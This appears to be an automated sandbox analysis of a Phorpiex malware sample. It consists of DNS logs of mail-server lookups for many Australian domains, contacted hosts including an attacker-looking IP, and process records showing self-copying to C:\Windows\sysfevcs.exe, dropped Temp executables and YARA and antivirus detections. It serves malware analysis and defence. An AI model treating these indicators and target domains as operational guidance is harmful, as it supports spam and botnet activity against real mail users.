                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.103380919 CET8.8.8.8192.168.2.30x682cNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.103380919 CET8.8.8.8192.168.2.30x682cNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.103380919 CET8.8.8.8192.168.2.30x682cNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.103380919 CET8.8.8.8192.168.2.30x682cNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.103380919 CET8.8.8.8192.168.2.30x682cNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.103380919 CET8.8.8.8192.168.2.30x682cNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.103380919 CET8.8.8.8192.168.2.30x682cNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.304147005 CET8.8.8.8192.168.2.30x2f69No error (0)riverside.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.323302984 CET8.8.8.8192.168.2.30xc508No error (0)mail.actraders.com.au139.99.135.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.331816912 CET8.8.8.8192.168.2.30xf8a8No error (0)austarnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.333484888 CET8.8.8.8192.168.2.30x36cbNo error (0)riverside-qld-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.333484888 CET8.8.8.8192.168.2.30x36cbNo error (0)riverside-qld-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.430434942 CET8.8.8.8192.168.2.30x6f17No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.430434942 CET8.8.8.8192.168.2.30x6f17No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.430434942 CET8.8.8.8192.168.2.30x6f17No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.449165106 CET8.8.8.8192.168.2.30x3454No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.449165106 CET8.8.8.8192.168.2.30x3454No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.449165106 CET8.8.8.8192.168.2.30x3454No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.449165106 CET8.8.8.8192.168.2.30x3454No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.449165106 CET8.8.8.8192.168.2.30x3454No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.449165106 CET8.8.8.8192.168.2.30x3454No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.449165106 CET8.8.8.8192.168.2.30x3454No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.449165106 CET8.8.8.8192.168.2.30x3454No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.487294912 CET8.8.8.8192.168.2.30x79f7No error (0)mail.austarnet.com.au143.95.39.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.492930889 CET8.8.8.8192.168.2.30x2d5aNo error (0)austarnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.518488884 CET8.8.8.8192.168.2.30x49d5No error (0)mail.austarnet.com.au143.95.39.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.691030025 CET8.8.8.8192.168.2.30xf188No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.711668968 CET8.8.8.8192.168.2.30x1136No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.756602049 CET8.8.8.8192.168.2.30x5461No error (0)people.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.756602049 CET8.8.8.8192.168.2.30x5461No error (0)people.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.778422117 CET8.8.8.8192.168.2.30xc41cNo error (0)ipt-mailgate-01.m2core.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.786140919 CET8.8.8.8192.168.2.30xceb8No error (0)students.plc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.786140919 CET8.8.8.8192.168.2.30xceb8No error (0)students.plc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.806256056 CET8.8.8.8192.168.2.30xaa1cNo error (0)mx1.hc210-97.ap.iphmx.com139.138.29.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.806256056 CET8.8.8.8192.168.2.30xaa1cNo error (0)mx1.hc210-97.ap.iphmx.com139.138.43.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.919563055 CET8.8.8.8192.168.2.30x93bcNo error (0)uow.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.919563055 CET8.8.8.8192.168.2.30x93bcNo error (0)uow.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.938179016 CET8.8.8.8192.168.2.30x17b3No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.938179016 CET8.8.8.8192.168.2.30x17b3No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.938179016 CET8.8.8.8192.168.2.30x17b3No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.938179016 CET8.8.8.8192.168.2.30x17b3No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.948705912 CET8.8.8.8192.168.2.30x2c55No error (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.968219042 CET8.8.8.8192.168.2.30x94d8No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.037303925 CET8.8.8.8192.168.2.30x883fNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.055578947 CET8.8.8.8192.168.2.30x209fNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.115571022 CET8.8.8.8192.168.2.30x784bNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.133529902 CET8.8.8.8192.168.2.30x81a2No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.179058075 CET8.8.8.8192.168.2.30xdeabNo error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.179058075 CET8.8.8.8192.168.2.30xdeabNo error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.179058075 CET8.8.8.8192.168.2.30xdeabNo error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.226305962 CET8.8.8.8192.168.2.30x304dNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.245809078 CET8.8.8.8192.168.2.30xe2e1No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.319017887 CET8.8.8.8192.168.2.30x213fNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.337434053 CET8.8.8.8192.168.2.30xba29No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.381694078 CET8.8.8.8192.168.2.30x681dNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.402852058 CET8.8.8.8192.168.2.30xcf0No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.479969978 CET8.8.8.8192.168.2.30x3f1dNo error (0)asav.tpgtelecom.com.au27.32.28.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.557409048 CET8.8.8.8192.168.2.30x9d56No error (0)healesvillemusicfestival.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.557409048 CET8.8.8.8192.168.2.30x9d56No error (0)healesvillemusicfestival.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.557409048 CET8.8.8.8192.168.2.30x9d56No error (0)healesvillemusicfestival.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.557409048 CET8.8.8.8192.168.2.30x9d56No error (0)healesvillemusicfestival.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.557409048 CET8.8.8.8192.168.2.30x9d56No error (0)healesvillemusicfestival.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.561348915 CET8.8.8.8192.168.2.30x626bNo error (0)streamingmedia.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.584522009 CET8.8.8.8192.168.2.30x7064No error (0)alt3.aspmx.l.google.com142.251.8.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.588881969 CET8.8.8.8192.168.2.30x2f02No error (0)filter.au.syrahost.com103.68.165.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.646873951 CET8.8.8.8192.168.2.30xcc8aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.646873951 CET8.8.8.8192.168.2.30xcc8aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.646873951 CET8.8.8.8192.168.2.30xcc8aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.669862986 CET8.8.8.8192.168.2.30x62a5No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.669862986 CET8.8.8.8192.168.2.30x62a5No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.669862986 CET8.8.8.8192.168.2.30x62a5No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.669862986 CET8.8.8.8192.168.2.30x62a5No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.669862986 CET8.8.8.8192.168.2.30x62a5No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.669862986 CET8.8.8.8192.168.2.30x62a5No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.669862986 CET8.8.8.8192.168.2.30x62a5No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.669862986 CET8.8.8.8192.168.2.30x62a5No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.764528036 CET8.8.8.8192.168.2.30x67dfNo error (0)optunet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.764528036 CET8.8.8.8192.168.2.30x67dfNo error (0)optunet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.764528036 CET8.8.8.8192.168.2.30x67dfNo error (0)optunet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.764528036 CET8.8.8.8192.168.2.30x67dfNo error (0)optunet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.764528036 CET8.8.8.8192.168.2.30x67dfNo error (0)optunet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.788011074 CET8.8.8.8192.168.2.30x9de0No error (0)alt2.aspmx.l.google.com74.125.200.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.789102077 CET8.8.8.8192.168.2.30xec47No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.789102077 CET8.8.8.8192.168.2.30xec47No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.789102077 CET8.8.8.8192.168.2.30xec47No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.807657003 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.807657003 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.807657003 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.807657003 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.807657003 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.807657003 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.807657003 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.807657003 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.101425886 CET8.8.8.8192.168.2.30xbb02No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.101425886 CET8.8.8.8192.168.2.30xbb02No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.101425886 CET8.8.8.8192.168.2.30xbb02No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.123322964 CET8.8.8.8192.168.2.30x74a4No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.123322964 CET8.8.8.8192.168.2.30x74a4No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.123322964 CET8.8.8.8192.168.2.30x74a4No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.123322964 CET8.8.8.8192.168.2.30x74a4No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.123322964 CET8.8.8.8192.168.2.30x74a4No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.123322964 CET8.8.8.8192.168.2.30x74a4No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.123322964 CET8.8.8.8192.168.2.30x74a4No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.123322964 CET8.8.8.8192.168.2.30x74a4No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.197173119 CET8.8.8.8192.168.2.30x6f9fNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.197173119 CET8.8.8.8192.168.2.30x6f9fNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.219175100 CET8.8.8.8192.168.2.30xed6aNo error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.256002903 CET8.8.8.8192.168.2.30x83beNo error (0)kingswayaustralia.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.256002903 CET8.8.8.8192.168.2.30x83beNo error (0)kingswayaustralia.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.277431965 CET8.8.8.8192.168.2.30x2dd7No error (0)mx.netregistry.net202.124.241.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.286334991 CET8.8.8.8192.168.2.30x5c12No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.286334991 CET8.8.8.8192.168.2.30x5c12No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.286334991 CET8.8.8.8192.168.2.30x5c12No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.304637909 CET8.8.8.8192.168.2.30x4963No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.304637909 CET8.8.8.8192.168.2.30x4963No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.304637909 CET8.8.8.8192.168.2.30x4963No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.304637909 CET8.8.8.8192.168.2.30x4963No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.304637909 CET8.8.8.8192.168.2.30x4963No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.304637909 CET8.8.8.8192.168.2.30x4963No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.304637909 CET8.8.8.8192.168.2.30x4963No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.304637909 CET8.8.8.8192.168.2.30x4963No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.632742882 CET8.8.8.8192.168.2.30x45b1No error (0)pit.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.632742882 CET8.8.8.8192.168.2.30x45b1No error (0)pit.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:47.050107956 CET8.8.8.8192.168.2.30x922fName error (3)dalsegnostudios.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                • 185.215.113.66
                                                                                                                                                                                                                                                                • icanhazip.com

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                Start time:18:53:37
                                                                                                                                                                                                                                                                Start date:12/12/2022
                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\l3Qj8QhTYZ.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\l3Qj8QhTYZ.exe
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                File size:74752 bytes
                                                                                                                                                                                                                                                                MD5 hash:042C4DA66DDA2CAB43007457E1E81A76
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000003.262918293.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000000.251631749.000000000040F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                Start time:18:53:41
                                                                                                                                                                                                                                                                Start date:12/12/2022
                                                                                                                                                                                                                                                                Path:C:\Windows\sysfevcs.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\sysfevcs.exe
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                File size:74752 bytes
                                                                                                                                                                                                                                                                MD5 hash:042C4DA66DDA2CAB43007457E1E81A76
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000000.260711622.000000000040F000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000002.485944774.0000000004610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysfevcs.exe, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                • Detection: 85%, ReversingLabs
                                                                                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                Start time:18:53:50
                                                                                                                                                                                                                                                                Start date:12/12/2022
                                                                                                                                                                                                                                                                Path:C:\Windows\sysfevcs.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\sysfevcs.exe"
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                File size:74752 bytes
                                                                                                                                                                                                                                                                MD5 hash:042C4DA66DDA2CAB43007457E1E81A76
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000000.279876335.000000000040F000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                Start time:18:54:09
                                                                                                                                                                                                                                                                Start date:12/12/2022
                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\2350331867.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\2350331867.exe
                                                                                                                                                                                                                                                                Imagebase:0x7ff651c80000
                                                                                                                                                                                                                                                                File size:13824 bytes
                                                                                                                                                                                                                                                                MD5 hash:ACAD915C5FC6C177940F8ED644E4FF76
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Users\user\AppData\Local\Temp\2350331867.exe, Author: Florian Roth
                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                                Start time:18:55:24
                                                                                                                                                                                                                                                                Start date:12/12/2022
                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\2676917645.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
